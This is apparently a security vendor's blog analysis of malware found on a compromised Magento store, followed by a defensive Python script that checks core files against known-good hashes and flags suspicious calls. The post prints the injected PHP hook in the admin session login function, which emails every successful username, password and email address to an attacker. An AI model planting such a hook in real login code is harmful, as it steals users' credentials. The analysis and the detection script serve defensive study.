While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We have posted a few times about this type of malware, but this one is a bit different in that it also steals the login credentials of the website's users. None of the ones we analyzed before had such behaviour.
The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails every username and password to XXX@XXX.com:
```php
class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    // ...skipped code...

    // Injected function: builds "user|password|email|URI" and mails it out.
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        // Note: "$pssword" appears exactly like this in the sample; PHP treats it
        // as an undefined variable, so that field is empty in the email as written.
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();
        mail($to, $subject, $message, $headers);
    }

    // ...skipped code...

    public function login($username, $password, $request = null) {
        // ...skipped code...
        if ($user->getId()) {
            // Hook point: called only after a successful authentication,
            // so every valid credential pair is exfiltrated.
            $this->testReview($username, $password, $user->getEmail());
            $this->renewSession();
            // ...skipped code...
    // ...skipped code...
```
This is the first time we have seen malware on Magento that steals credentials alongside credit card numbers. If you're using Magento as your e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.
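As an added illustration of the "check your core files" advice (this script is not Sucuri's scanner and not part of the original post), the following Python audit hashes a Magento tree against a known-good baseline and greps any changed or added core file for calls such as mail() that do not belong in Mage_Admin_Model_Session. The directory layout, file contents, baseline and the simulated tampering are all constructed for the demo; the only path taken from the post is app/code/core/Mage/Admin/Model/Session.php.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Calls that have no legitimate reason to appear in Mage_Admin_Model_Session.
SUSPICIOUS = re.compile(r"\b(mail|base64_decode|eval|curl_exec|file_put_contents)\s*\(")

CORE_SESSION = "app/code/core/Mage/Admin/Model/Session.php"  # path named in the post

def build_manifest(root: Path) -> dict:
    """SHA-256 of every .php file under root; run on a clean install to get the baseline."""
    return {str(p.relative_to(root)).replace("\\", "/"): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.php"))}

def find_suspicious_calls(source: str) -> list:
    """(line_no, function) for every suspicious call found in a PHP source string."""
    return [(no, m.group(1)) for no, line in enumerate(source.splitlines(), 1)
            for m in SUSPICIOUS.finditer(line)]

def audit(root: Path, baseline: dict) -> dict:
    """Diff the tree against the baseline, then grep changed files for suspicious calls."""
    current = build_manifest(root)
    report = {"modified": [], "added": [], "missing": [], "suspicious": {}}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
    report["missing"] = [rel for rel in baseline if rel not in current]
    for rel in report["modified"] + report["added"]:
        hits = find_suspicious_calls((root / rel).read_text(errors="replace"))
        if hits:
            report["suspicious"][rel] = hits
    return report

def demo() -> dict:
    """Constructed sample: a clean Session.php, then the same file with a mail() call injected."""
    root = Path(tempfile.mkdtemp())
    target = root / CORE_SESSION
    target.parent.mkdir(parents=True)
    clean = ("<?php\nclass Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract\n"
             "{\n    public function login($username, $password, $request = null) {\n"
             "        // ...\n    }\n}\n")
    target.write_text(clean)
    baseline = build_manifest(root)  # taken while the install is known-good
    # Simulated tampering: an exfiltration call inserted into the core login path.
    target.write_text(clean.replace("// ...", "mail($to, 'Webserver', $username.'|'.$password, $headers);"))
    return audit(root, baseline)

if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is generated from a pristine copy of the same Magento release and stored off the web server, so an attacker who edits core files cannot also rewrite the reference hashes.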